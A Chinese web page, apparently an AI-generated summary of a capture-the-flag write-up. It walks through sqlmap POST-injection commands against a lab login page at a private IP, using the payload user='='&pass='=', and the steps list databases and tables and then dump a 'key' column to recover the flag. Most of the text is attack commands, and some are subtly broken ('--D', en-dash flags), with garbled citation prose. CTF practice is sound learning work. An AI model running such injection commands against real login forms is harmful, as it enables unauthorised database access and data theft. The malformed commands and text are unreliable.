sqlmap万能密码
时间: 2023-08-27 10:16:40 浏览: 118
万能密码查看
根据引用和引用中提到的方法,你可以使用sqlmap进行post注入攻击来获取数据库信息。引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" --dbs" 可以用来获取数据库名。然后使用引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" --D user –tables" 查找表名。最后,使用引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" -D user -T flll4g -C "key" –dump" 来获取字段key的数据。这样你就可以找到flag信息了。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* *2* *3* [CTF---Web---SQL注入---01---万能密码+sqlmap](https://blog.csdn.net/qq_22160557/article/details/119194712)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"]
[ .reference_list ]
阅读全文